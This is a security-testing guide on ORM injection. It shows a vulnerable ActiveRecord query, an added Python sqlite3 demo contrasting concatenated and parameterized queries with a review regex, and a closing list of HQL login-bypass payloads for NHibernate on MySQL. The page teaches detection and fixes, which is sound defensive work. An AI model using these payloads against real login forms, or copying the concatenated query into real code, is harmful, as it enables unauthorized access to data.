Object Relational Mapping (ORM) Injection

ORM injection testing is similar to SQL Injection Testing. In this case, testers use a SQL Injection against an ORM-generated data access object model. From the tester’s point of view, this attack is virtually identical to a SQL Injection attack. However, the injection vulnerability exists in the code generated by an ORM tool.

ORM tools include Hibernate for Java, NHibernate for .NET, ActiveRecord for Ruby on Rails, EZPDO for PHP and many others (see the list of ORM tools).

Example

Patterns to look for in code include:

Input parameters concatenated with SQL strings. This code, which uses ActiveRecord for Ruby on Rails, is vulnerable (though any ORM can be vulnerable):

Orders.find_all "customer_id = 123 AND order_date = '#{@params['order_date']}'"

Simply sending ' OR 1-- in the form field where the order date is entered can yield positive results: the quote closes the string literal, OR 1 makes the WHERE clause always true, and -- comments out the trailing quote the ORM appends.
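The following is an added example, not code from the original page or from ActiveRecord. It uses Python's standard-library sqlite3 module as a stand-in for the SQL an ORM would generate, so that the concatenated and the parameterized forms of the same lookup can be run side by side on a constructed orders table. It also includes a small heuristic review helper (flag_interpolated_queries, a hypothetical name) that flags Ruby query calls containing #{...} interpolation, which is the code pattern the section tells testers to look for. The table, rows, and the RUBY_SAMPLE source are constructed here.

```python
"""Added example: concatenated vs. parameterized query, plus a code-review
heuristic for the interpolation pattern. sqlite3 stands in for the SQL an ORM
such as ActiveRecord or NHibernate would emit. All data is constructed."""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory orders table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE orders (id INTEGER, customer_id INTEGER, order_date TEXT)"
    )
    conn.executemany(
        "INSERT INTO orders VALUES (?, ?, ?)",
        [(1, 123, "2024-01-05"), (2, 123, "2024-02-10"), (3, 999, "2024-01-05")],
    )
    return conn


def find_orders_concatenated(conn, customer_id, order_date):
    """Vulnerable: mirrors the ActiveRecord find_all pattern, where the
    user-supplied order_date is interpolated straight into the SQL text.
    A value such as  ' OR 1--  closes the literal and rewrites the WHERE."""
    sql = (
        f"SELECT id FROM orders WHERE customer_id = {int(customer_id)} "
        f"AND order_date = '{order_date}'"
    )
    return sorted(row[0] for row in conn.execute(sql))


def find_orders_parameterized(conn, customer_id, order_date):
    """Fixed: the value travels as a bound parameter, so it can never change
    the statement's structure (the equivalent of where("order_date = ?", d)
    in ActiveRecord, or a named parameter in an HQL query)."""
    sql = "SELECT id FROM orders WHERE customer_id = ? AND order_date = ?"
    return sorted(row[0] for row in conn.execute(sql, (customer_id, order_date)))


# Constructed Ruby/ActiveRecord source used to exercise the review helper.
RUBY_SAMPLE = '''
Orders.find_all "customer_id = 123 AND order_date = '#{@params['order_date']}'"
Orders.where("order_date = ?", params[:order_date])
User.where("name = '#{params[:name]}'")
'''

QUERY_CALL = re.compile(r"\.(find_all|find_by_sql|where|order|select)\b")
INTERPOLATION = re.compile(r"#\{")


def flag_interpolated_queries(source: str) -> list:
    """Heuristic code-review aid (hypothetical helper): report lines that
    call an ActiveRecord query method and contain Ruby #{...} interpolation,
    i.e. input parameters concatenated into a SQL string."""
    return [
        line.strip()
        for line in source.splitlines()
        if QUERY_CALL.search(line) and INTERPOLATION.search(line)
    ]


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1--"
    print(find_orders_concatenated(db, 123, "2024-01-05"))  # [1]
    print(find_orders_concatenated(db, 123, payload))       # [1, 2, 3]
    print(find_orders_parameterized(db, 123, payload))      # []
    for hit in flag_interpolated_queries(RUBY_SAMPLE):
        print("review:", hit)
```

With the constructed data, the concatenated lookup returns every order in the table once the payload is supplied, including one belonging to a different customer, while the parameterized lookup simply finds no order dated ' OR 1--. The review helper is deliberately a coarse regex; it is meant to give a tester a starting list of call sites to inspect, not to replace reading the query-building code.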

HQL injection (HQLi) examples – NHibernate framework installed on .NET

  • NHibernate escapes char ' with ". Chars " are considered ' escaped char by HQL and an " in MySQL.
  • MySQL escapes char ' with \'. Chars \' are considered \' by HQL (\ is normal for HQL), but ' (escaped quote) by MySQL.
  • admin"-- in username and password is blank
  • admin"# in username and password is blank
  • user1 in username, " or 1=1-- in password
  • user2" # in username and password is blank
  • user2" /* in username and password is blank
  • or 1=1-- in username and password is blank
  • or 1=1# in username and password is blank
  • "OR\"=" in both username and password
  • UNION SELECT * FROM logintable -- in username and abcd in password
  • 'user1\" or 1=(select 1)--' in username and password is blank
  • " or true-- in username and password is blank
  • '" or ""='" in username and password is blank
  • '') or true-- in username and password is blank (to review)
  • "') or 1-- in username and password is blank
  • '')) or (("'))=(('' in username and password is blank (to review)